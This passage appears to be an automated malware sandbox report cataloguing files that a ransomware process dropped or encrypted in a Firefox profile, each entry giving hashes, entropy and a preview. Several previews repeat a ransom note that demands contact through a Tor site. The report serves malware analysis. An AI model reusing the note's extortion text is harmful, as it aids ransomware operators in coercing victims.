                  Entropy (8bit):7.955688366654047
                  Encrypted:false
                  SSDEEP:96:/hdIf5vdJd5nIKYcQkeYpMQMuB9gN9dLFc6sXFRxpsyOrKhqbD0:/SVFIhcLpMoXgN99FveFNszKqbQ
                  MD5:254E5F11B041DD23CAEA9B9586D1CF45
                  SHA1:3F00A4F2D923AC15920B0F033081EB9359B200A5
                  SHA-256:D192EB237FC4E1EE562203C055BE78F2C98EB3E602EF194DB754B483303DCEF4
                  SHA-512:025331084AFF9D8337D3FA9550B0CC200B22EDFB97E83DEE16EA3B32E21FB4ED7892C043DD4E68BD1F780046A146C086EF71337DF11C0D406D3FEBF8263715A5
                  Malicious:false
                  Reputation:low
                  Preview: ]..ur.c.is.t.p.:..k.m.A...j`g.c!.9...u.Z..e.c..N......#.._......Of..;...]PF{.BN..........p.............q.....;.D..i....w...A.g.MH...)|>...INB...Y`.S.Y....C.52..|.'..U...49+....99....'..I.l.....n..?f..O.+..&..."4..........+......"I...B?y.......5y=mU..]u.,.Y.7H.....l"%....wf..`w.a`...c......;...Fi......7G.......c..:...+iC+v..s.....L.~..e...%....$..*..puy.h..........st...~D. ....M............ ...zV[.o..2.;BM.....3.......yJ.......K.w....{r.,TQ%...9V+*uz..B..P....dE..$...Q....U5A..1\b..|...Aq>........ji(,b.G....P.H..x..6m.PF$=,y..`..r;D.n.c..3....B..I.%_.n....U2..5.3...R....g...f..&Cu...|.>R....)....8;wYEt..nF........h..p.+u.g.j.&d....5......*Q......ya..@R.x>.o+...7(..TF).........RA.......m5.|.op..B..*.^./...s.....Y.?.S,../.Pi..1....._..kL...........U........u_l..(M!P"..k..8.b`.....0i......|S.|B..\.....t...H.X..d.k..^.L.......-....W.3.d.z.....}"I./.-...*W....g7T. ..G......'_..X'~H....j......z.,R..K.....k%.8..Ph.C.io.#.)74....M..c^.........G........}..s'~+0.\.O....u........-.4....l..^..f.>.;
                  /home/user/.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/search.json.mozlz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):11149
                  Entropy (8bit):7.975088989626362
                  Encrypted:false
                  SSDEEP:192:Gh8PPJBSxo46MlNX804rt5M3U0d7N9jK0g85xbFzd+:ywSW46MDZUWW0g85hFzd+
                  MD5:6F75FC86F28E3ABDF2A98D62040ABC10
                  SHA1:7B30992DAC3009BFA2C6240069A5B3D6028F50CE
                  SHA-256:7CE65C6B2C4C7B98914F03ECDA93F404C9611D4091A40756BF54100713FA2C7B
                  SHA-512:9D422275EA20D816155E16BFDF4FB7A8C32775C6F61919F8FB99CBB1E4BC29C7A9997A6349A0BD988DBFE8FEC541DA1D4A031084247FC3BB4875A86BB414A40D
                  Malicious:false
                  Reputation:low
                  Preview: 3..u.k`.v....Q...{O-....jk..5v.."P..h.7.....b..Z......2..fP#..I.O.;9T..R.1.&...Z.^......:0S.G.0.N..hCzM.mSx.k..4(...<x.-.H.6.md....&P...{.-...G*......B[....'.;.... ....3x.....^V.*.h.v(T..CtB?..t3.[.*.n..(......-..J.<....?!...S..t&........4 ..S.PR'Xk?.^....wk..o Z....I...{x.k....7!y%..h\..z...@M.]l.d"Xe..:.)..dT2....Z\.L....>..n......B..~..)?...&x(.....].....w..$l.z.rG..b=}.^.U.....X.MD.N.\&.....Cf......a...$.cE.f/.5..A.Y.-.N.0.Z..X>T].8.gI;.nC.R.+$.G.gO..U...<y>.......R.1~a+..=,:.m2..aw...6.}X6e.....+.O.25...$..b2..GN.Z.af.......9.W...Q...XM!b4.{....:e\Yz..`G.!.o._9T....J.o.N..9..1..D..G.....s$.........Y.F<.W.%..9..m.%.3x....As..]0...XH..k.m.+..p4.y.6:.V[./...|.lT.w..,...s.ak.9.<..0.{$.}.s...a:@I..gN.=~...._|...ctQ....@+....1..uJ*..D...D.............2..COp.|..M).......ve..W.....P...G.;..Dt...Xu..C.....$..l?df..j.<y....M:.E.......>{.V....V;....;...........^ma.g...........NI.n..R..i...%n......sS.T.....a....~......_.5cc..og-.e./.=..%+...>......../...8.)...e.o.v.9..U.....y.......C.Nd0.Yi..
                  /home/user/.mozilla/firefox/u5o5kk16.default/secmod.db
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):16616
                  Entropy (8bit):7.986545539536673
                  Encrypted:false
                  SSDEEP:384:alULEW+TlggGv/nJIR2N068bUWk//zhuTKJUMY8Sit:Io+Tlggi/Wj6vXguHYmt
                  MD5:49761FDF49BE900DBCF30008DCF6A094
                  SHA1:3A7D83171B2B5FF7EE04032F68A3103B8B246B66
                  SHA-256:D263F6B570B2B39637170EE204D1429B7867AFBB321AD3957AD43EB4AB3D4967
                  SHA-512:1D03CE69913BD33EA659AFD8A6050068E8E7DD56553E43EC292061B59FF33D7C9FCCF88E489ED38880ACC8E8924C62F87FBA3C093B398917E8721427155F8E0C
                  Malicious:false
                  Reputation:low
                  Preview: e...42-on{/...fOin...{....$..^Iwr6<..D......K}.....~.y.W...(8M...&{.....&.X..f.....I..-...pw".Q5.....!.t.......0...$<.....~2./.....<F%o.....N. s~..kHEM%0..B.....R...u..v..6........5.............$[.L..;......]X.q.F+..r.7t..]G.*]<....#.jq.U..W.$A.N..O..a0Xs{p:.."...or..K.v...... ....v.vSu*q...*@..V.{].Y..W.<..(.&...6...?`G..)EV.....)j...k.KB..R._...3.VR......;..."g.S3.{......!.P...:.l.4.6..u-....h.$.Yt.k....^.a.....V..M....F/Q..._..@...W.{.B..1.F..Bs...phL..../F.....l3@Z..U.3...<.....9&wF\n..A........B...U&...Qi......].Bx.3...-.(.....*..#d...].'...fu...Ja...o..v.....R...._.T...&.D6. ..<u.....zoE. ./..1....p....m.......*..g...-..v...^....$....sb.....w3h_Nr.,rz...... .f......A...o...$;../J..a.rAT..N..U....65:...Y9..[N..<W Va....X..T...d*p.......BY..*fx.j9......\n%~.....1...&..X... ....l.6.$n.7....m?..#ln.v1.....R.V}.Bv.wS.`..55..B..].H/y...5.4...M..]....-....%1.G.Y.,.g..;.f.:....F....3Ls.\q.......-..iNpv.....K..w......{..k...B..A.C.^....kQ3@.3Y.y;.=.......w.;....s..]r.`.W....g..S.]...C..{.
                  /home/user/.mozilla/firefox/u5o5kk16.default/sessionCheckpoints.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):520
                  Entropy (8bit):6.84306753274679
                  Encrypted:false
                  SSDEEP:12:9hCgmmVK0Sr7vSyUJv8TZjpym+2DcUBvxQ4n:yZRvi6jpe2DfJX
                  MD5:5EB3CDAAD2261B378206C3473BA9BBBB
                  SHA1:00E5D64AA019A9804B9C7E3D4047E4F7E7872EE8
                  SHA-256:3897EA5387FE4FBD9CFF18CCD0FC4EBE4FF0A214E91853A29D07FF0FFCD378C5
                  SHA-512:2878E1FEE70EA0CE516861FA2D49B7C634026689ED1AC562F4283275E5A4FA7F04EED82B4A691D746BAA5D8E9127FBFFB354BFA42B546510E0C5FD6ECF6EDFB2
                  Malicious:false
                  Reputation:low
                  Preview: H|.d...8.!..A=Qz.Zp.I....YpW.g?..iu...p#....j.:.n.U`.i.[...^../`.[.....p.,.R....KU...*Z.v>....n....\2{.."..5s....!+....^...o|.,..........8/..s..n&..$.N..........7....7Tt....Ye..\.1...b~.V.*.....s.`.0T$.tB........L...R.<...V...r..'...-UW..*:...La.P..K..(.......\..'Lv/.....t..,=#....D.d.<.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................<.......v..G.+...M...$..Ffc(.,{.w.f.............P...
                  /home/user/.mozilla/firefox/u5o5kk16.default/sessionstore-backups/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/sessionstore.jsonlz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3231
                  Entropy (8bit):7.877760669278776
                  Encrypted:false
                  SSDEEP:48:rbMNhLvNnMsHJWWuK1Xe5+mIg6e7Ij3AmgxkmfX+rkeV3+EszfHolqqNbADhi:sNhRnMUuEm+M6ey3AR7v9ZESIfNEDhi
                  MD5:70E69300C2F42044A2F58BE50C71B0A1
                  SHA1:E61184D9B5595BB5A0D9FA0BF9D246F3B0D711E5
                  SHA-256:079AD688CBB1A01A9E41C1FB2D2A37A60683C88719EE02F56D5DE28834D44DE7
                  SHA-512:6FAD6C532A758170FF1393B186CF5889BEC21D0EF118F7CA8E70FA0B73C29176A461FE9442B379D62DE2EBC17675B4A3949D7B1D90321FCC4ED789064AD27C38
                  Malicious:false
                  Reputation:low
                  Preview: )c..Z..r.b.?....c#.......3.\W.N.....9......r6.e5z..S.u..2.I.X}.O..U`.J..\..6+HN2.?.....A.f}....N.|Z0R.....(Z....C..U..*4.....@.....".J..?V..).1t.8.G..X.e............H....2....$1N.!-....X...RE...JB.h.....9..SX......r2..+... a...R.#....!!rZ.|..r.nlY4k.4....E...s...../.....>...t>.f.>Y./[...+k...h...........A-M....^L.......}..o..S5...sF...&.=.1.O....R~.^...8...f.g9R....w....:.]....j.(.....A5.O:.N....s.>......Ii.>.......)\A?..n.c-..OK.}....=;kcZ.....Yg.o.>v.<.........\.....F...zz$y_.F/M.).@...V|...T.$.a..8H.|......n...l9L.....GCpn.Sv|.Tz........D..w.)...U....M...AC.f../~x.J...........~ Y...%,...j....0".^..17.........E...<b/..).WU.y.l..m"6u.q`..\W.*2Jf..W......eS:..u.[..38..(....{..0.(-...h.=.2C..|L.1....)+.y.y.._!].....'@..}..=Q...1c..XS.Ys.....|~nO.....{Q.4.......%/...z..b.n..v..*.d\....#....r.'<.....r...==....E...k5...F.R..?Z.*...N.t..b.k.$CH.C.....Z.:...z.........1....A4~....>.]z......e.7.D..T,.x..].......=j$t..FY.iJF.Iy.&.#H.#..XMd.../..L.S?.3;.'..\^BZlx..yi.. .&..g.-5.Sja..._..A.F.R.0.
                  /home/user/.mozilla/firefox/u5o5kk16.default/shield-preference-experiments.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):619
                  Entropy (8bit):7.0506159490595
                  Encrypted:false
                  SSDEEP:12:d7tMYcLuDO7CQIzVVhr7DD1ch3diA/a2DcUB32DT/d6:djcgO7gR7KlS2Dfeo
                  MD5:D95E17786ACCC1B59F7C82932BDA0D3C
                  SHA1:48C39EA6288957143BB27B2940DC046E94373A18
                  SHA-256:E0D6091A674F1DB3FF572AA1E9C9F7BF46A47AB095A5B9B89F47D8B35EC77402
                  SHA-512:0E9AF5C4DF2408ADF53B89F3965706741BCA6F356E715BEB152B2C7F4132ADD75C7411DA6ABB0E309093A15AD29A0B703E034DB80323AF397C2D2E07DC33DCA4
                  Malicious:false
                  Reputation:low
                  Preview: .vG.*$h..4S...V..?..`...=n.....L.M...A.....w....L.y..w7>...]...i].C.....8e....{f....n.$s.._+.,.`..rP$.O...c...r..\.4'.v.".<..M..M...5...3..N.n.M0...NSo.0...W._.!..0.U..Y ~..W....Mg.6t.M.x../|&P...T.<k....'V.(..;...-r>......A"...C.5h....v......d.O..~....$.0. .e..#..]...f=...]......4.....{...{e..L4.>.r.Z......*(.\s.x.v.Al/x.u...8.v}.\.v<.3..u...SO.........L..H.K..=c...._....u{G...Nkp2.q%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................R.....l.f....L....D......._`.....o.....6Sd.........J..x
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):744
                  Entropy (8bit):7.233395284135713
                  Encrypted:false
                  SSDEEP:12:StbUpA2YNw3h+AqIzGbN+C54cVHccq5WieAOxo6GtWEei+f2DcUBLR21r:SSp3ItNWcVEwieDxe+iA2DfTgr
                  MD5:433645BEB08B4B859642619DCC5AB6B3
                  SHA1:FFAFE2316EAE9BE22C47C443C650153D780C17C5
                  SHA-256:BD999CD4762A4ABEB7A808F59E1112AFDA8452E1E5B368C3C6E81DAEC50DAB42
                  SHA-512:591D0BF863D0D93AC2C4E8CBF2C96A32249932DCFC105405B62C94F211BB00572FD03138ADFBB1C011C0CDAE847DD8E05723F4D37751CF1B3115A8AC7AD1968D
                  Malicious:false
                  Reputation:low
                  Preview: .z.\...Z..#$......@{...(.41m.4rn.x.....,.Oi}_...m..'.x...#p.....}..ur..-.?.......c.........J....*5...!.....v..t3+...;..1.K........wC....l...K.|.R3%-.t....|....>..I....$.Tm ........N.DN2.V>.......k$......X7..%I.....T.Y.....J........N....O..B.6.j.l;..&.[..{...T..1....o..{.U.v.........*\.8hYO.0..........=.........f.J......l.S..d/.........{..F.@...........b.m.....f1.fP.P.9F`f...5*.9mj.A......_OV.@.....].....w./.\m!...Z.*Y.O.O....\.(L...|...H.J#.U.>Z^\L..N'....(..C.....2..U.y..".D.K.ng..|.Q....8...3...v....8..H.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................(.\..3`hJ.H......I.........z.*..?.wj.~....\..........&.L
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/.metadata
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):273
                  Entropy (8bit):5.3858504258589575
                  Encrypted:false
                  SSDEEP:6:dt1aBldUPVU1zmhOO/EUyp6XcX429rZOVkHO4HP:dHaxUm2DcUBdWMo1P
                  MD5:DB2943304BAAA8DE17BA4F598C7EB884
                  SHA1:AD9311A7C694375EE591544369BB1B967C76D0F6
                  SHA-256:BF1A456DC28F759B1E5F7C55F08645C634810955DF0956A4CE4228833F6708DC
                  SHA-512:61338BE390CD91F1B5CEE7101418E06068DEDBF66D6CBB6D830CB740A1CDD39C6855E013FDE74B6AAC586086D28A00DE9EA584A8AAB59A601B90D6CA2263AEFF
                  Malicious:false
                  Reputation:low
                  Preview: ....Od.b....Y...h.@:Y...74_.u.D......i.g.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................i...o.Y&.z!.?..V'.N[c....G......G......A.............x
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/.metadata-v2
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):286
                  Entropy (8bit):5.49656617911803
                  Encrypted:false
                  SSDEEP:6:g8pgNp/iiP1zmhOO/EUyp6XcgBevX6eUJt1:gqgNpn2DcUB9BneUp
                  MD5:9F98262D56B65433ED0445C33F8F88EF
                  SHA1:B71638B3F9549A73B887853B877E22DD1212C220
                  SHA-256:DB1CDAA55E5B75EA306D970A2AA35F609151A0A2D8326E73B9609FD6E2B1240B
                  SHA-512:F2E889662708DA027A394F891D838108F5709B8808623CE1CA6B7971AFEDF23EABF1CDCF0747BB23131AFC04E021D7E67E43AD128B99FDAC365B9D24750DF7E0
                  Malicious:false
                  Reputation:low
                  Preview: =3o...&+..!.=.i8../l.%..uV~W.....&.Mg-..A\c9..I..P....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................N~....Uv...)....w:B.B..;.U.....`....-bm..W...........H..
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/3312185054sbndi_pspte.files/1
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):4977978
                  Entropy (8bit):7.999961674402121
                  Encrypted:true
                  SSDEEP:98304:OOc3HoTGwJxKNdbcKyHq7Ypra+whJLsM5LtRTHw03PFR6iJajTtki:OuTGwobcKmaX/LsCL803CiJETt1
                  MD5:18E5BC9DB544E569CFD3C0487BC9CDF9
                  SHA1:9F5A745D37FD42CD48FD9EB9958A1DB5A3513843
                  SHA-256:EDAE209B3E00DB8D812AB9BDD14DD0AF3E493CD047D973EF51E7393D826FB5D1
                  SHA-512:CB1E98365365C1A4CB7B0B76109B16795282137D236AD4389A18CD2D67293986D5CF60EEEA762309E01A93839ACEAE651345EF9683135A03D4C5665837BB240C
                  Malicious:false
                  Reputation:low
                  Preview: .(..F.....5..s....@n.g.:|.)tO.......t.....NAP........7....W..h3....h.)N..+.97....Z..4...8K..........XdX......X.......d\...|.....t........".5&...g64..#...x....hPQ........X.kI,.D..1.....e.l.c...g.\(zT....TJ...&.}.7.....'..../.~T...;..{.....X.I.w..@.*.Q....^........^E.P..1^b.y...}...ej...~..e....z........1C.....r....r.>....C.>.n)2.H.....s{....r@....(b....W.h..q......x\.66.S....p............$.z...`.C.?eI.Q....h..t..J.$G{h.........*...-d../....Tp.,...U?.c"kVc..S-Y.....p:....=.6S....g.#....%V0......E.........&......F|@.........O.3.......(.>,. n$.Q..2..)..d..]....15<O..Q.?...e.+.S..,....|.qy.)R.Y.u.4.#Z.8._[....;.u.s&G].**q..Q,..L.t..........N..lj.>s.......!.;.8.."...TOk...1.J....UQ...t..0..........$.D........4.z...B..g6..p..:...#..?H...8..................p.,.8...z..w....Iz9........4R.....!4S...i..S.Mq:..Q."...B.b.Z.\...~[.F..9Y......=h.wy.&.^.....)O..4].EiQl...#.........O;PI.~..4<.&w.. .b.3......nfq..Cu._.yO:4@M...+..{u/o...0...*D..L...l..x.T.....)E.BQ..GJ....C..$../t%2....{!Cl...+...x )g..*
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/3312185054sbndi_pspte.files/journals/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/3312185054sbndi_pspte.files/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/3312185054sbndi_pspte.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):49384
                  Entropy (8bit):7.9962339532265
                  Encrypted:true
                  SSDEEP:1536:AQBYHTXjHddj8UknY7vLhCan3oZo+xWAbAq:AtHTjLIUknY7jhC0ViPl
                  MD5:A2D00B88D36E9CB545594025F78E46A7
                  SHA1:11833DB6B4805BCA8BE205BE1BD5D40B8FEF51D7
                  SHA-256:114BF573BC4C1C9C60CB270270C5B7C39539CD3684534B88A4C75133DD992446
                  SHA-512:DC0F5656687220C1F96A7DFC708B144669053E2A01DA8AE7F92C77452755ABCEDFAA557D7B4C8BFDEAF241436509C21C39DDC72CE09FE14CFAB3DCA35487A248
                  Malicious:false
                  Reputation:low
                  Preview: 9\.Ll7.~.....>[.#q...F\..u.`T\.$db./......:...."..e~ ......fZ...-|d..?h......v.......q..6..26s...#.>.1.F.....0.rH.Q...%..8..P.%.!-...?..J...i....................S...;0...... u..^..a`......t..95].D3.4.{...P....L..P.....<.A...jM...},-....l|MP......jx...S.....r.j.......F6L...y..bP..0F..5n..{.~c... xR.A..."..f..=p..%.p...=.NSX...p<.....^<....V.........N...>g.l'8]..S.v..po.(...#2I.\..x.wmp..W..-......r.zD\9.f......*.^...............j5.`.....=.-,.cW.(..v E.o.!..`...@..XB...d.u..KSh9.*ud~....}.P....l......z.7..c`H.6.b..:.vP.2RnHy...s..a*.....U....^O!.......c.K!..%^x~..[z{{.....>.Q.o.O......>....AyR.j.5"..Kl..>...<.<...G`...A...........%..D..G...>.A;.. ?..8.V:6..?.!s,,.......,.zt...._D./[.-.Q..!#k.H..#..^.....8.#.g.W.6..D6............7r.0..;2.....kn......O.9.u%....7.D.P.W..d.<.b..l...%..V.z8..d.{...'I6g...=...,K.$....c...i.\..........,....c=h..+n........m\r..!.Y..........vDS'|\X..RRJ...T..:.A.fN....K~j)z..C.^~M_C../.......k.b..GT...A..,{$.Nj........S..k~.,..}q.S.If.~..Hymj..9K@..=A.....M..X:..
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/idb/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/about+newtab/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/storage/default/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
